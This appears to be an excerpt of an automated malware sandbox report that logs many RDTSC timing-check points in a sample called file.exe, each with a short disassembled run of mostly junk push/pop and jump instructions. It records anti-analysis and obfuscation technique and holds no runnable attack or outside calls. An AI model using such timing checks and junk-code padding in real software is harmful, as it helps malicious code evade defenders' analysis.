                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC49A second address: 5EC4C9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F9355816h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F96F935581Eh 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007F96F9355816h 0x0000001f jbe 00007F96F9355816h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4C9 second address: 5EC4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4CF second address: 5EC4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC798 second address: 5EC79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC79D second address: 5EC7C0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F96F935582Eh 0x00000008 js 00007F96F9355816h 0x0000000e jmp 00007F96F9355822h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC7C0 second address: 5EC7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F96F91F29BAh 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CBA3 second address: 57CBDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F96F935581Eh 0x0000000a jmp 00007F96F9355823h 0x0000000f jno 00007F96F9355816h 0x00000015 popad 0x00000016 push ecx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop ecx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CBDB second address: 57CBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1F80 second address: 5F1F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2114 second address: 5F212F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29B7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F212F second address: 5F2135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2135 second address: 5F2149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2149 second address: 5F214F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F214F second address: 5F216F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F96F91F29B9h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F25E2 second address: 5F2600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F9355826h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F27BE second address: 5F27C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FA76F second address: 5FA790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F9355826h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2F4F second address: 5C2F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2F53 second address: 5C2F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F96F9355816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2F5D second address: 5C2F6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2F6B second address: 5C2F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3477 second address: 5C3487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C34F0 second address: 5C34F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C391C second address: 5C3925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3925 second address: 5C3984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F935581Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F96F9355818h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 add edi, 3875ACE6h 0x0000002d stc 0x0000002e push 00000004h 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D2992h], eax 0x00000037 mov si, 727Bh 0x0000003b popad 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F96F9355826h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3984 second address: 5C3996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F91F29AEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3CD0 second address: 5C3CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3CD4 second address: 5C3CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4117 second address: 5C411D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C411D second address: 5C4121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAEC5 second address: 5FAED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F96F9355816h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAED0 second address: 5FAED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAED9 second address: 5FAEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB029 second address: 5FB02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB02D second address: 5FB039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB19A second address: 5FB1A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB1A0 second address: 5FB1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F96F9355824h 0x0000000c jbe 00007F96F9355816h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB2F9 second address: 5FB31D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F96F91F29B9h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB31D second address: 5FB325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB4C3 second address: 5FB4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F96F91F29A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5779F4 second address: 577A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F96F9355820h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60055F second address: 600576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 js 00007F96F91F29A6h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F96F91F29A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600576 second address: 60057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60057A second address: 6005A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F96F91F29B1h 0x0000000e popad 0x0000000f jo 00007F96F91F29B4h 0x00000015 jl 00007F96F91F29AEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6006FB second address: 6006FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6006FF second address: 600705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600705 second address: 60070A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600877 second address: 60088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F91F29B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600CE5 second address: 600CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600CE9 second address: 600CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6001F2 second address: 600215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F96F9355827h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600215 second address: 60021D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60021D second address: 60023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F96F9355828h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60023A second address: 600242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600242 second address: 600248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6010E4 second address: 601102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29B8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60153D second address: 601541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601541 second address: 60154B instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F91F29B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60154B second address: 601551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604CF4 second address: 604CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607D73 second address: 607D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800D9 second address: 5800DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800DD second address: 5800FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F9355829h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800FC second address: 580124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29B7h 0x00000007 push ecx 0x00000008 jns 00007F96F91F29A6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580124 second address: 58012A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58012A second address: 580130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580130 second address: 580135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580135 second address: 58015E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F96F91F29BDh 0x00000008 jmp 00007F96F91F29B1h 0x0000000d jg 00007F96F91F29A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 jnl 00007F96F91F29A6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A56 second address: 607A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F96F9355816h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A66 second address: 607A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607A71 second address: 607A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AA6B second address: 60AA87 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F91F29A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F96F91F29AEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AA87 second address: 60AA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60ABB6 second address: 60ABBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60ABBA second address: 60ABCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F96F9355816h 0x00000008 js 00007F96F9355816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60ABCA second address: 60ABDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60ABDB second address: 60AC1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007F96F935582Ch 0x0000000f jng 00007F96F935582Fh 0x00000015 jmp 00007F96F9355823h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6128FE second address: 612918 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F96F934F1F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612918 second address: 61291E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61181A second address: 611820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3B63 second address: 5C3B7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F96F95D6D6Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3B7A second address: 5C3B84 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6119A9 second address: 6119AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6119AD second address: 6119C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F934F1F5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6119C8 second address: 6119D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611B2A second address: 611B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F96F934F1EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F96F934F1F5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611B57 second address: 611B63 instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F95D6D66h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611B63 second address: 611B6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F96F934F1E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61260F second address: 61261A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61261A second address: 612620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6161AE second address: 6161B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6161B2 second address: 6161D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F96F934F1EBh 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6161D3 second address: 6161DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F96F95D6D66h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616375 second address: 61638F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F96F934F1ECh 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F96F934F1E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61669A second address: 61669E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61669E second address: 6166BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F96F934F1F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6166BD second address: 6166CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F95D6D6Dh 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6166CF second address: 6166D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6166D5 second address: 6166D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
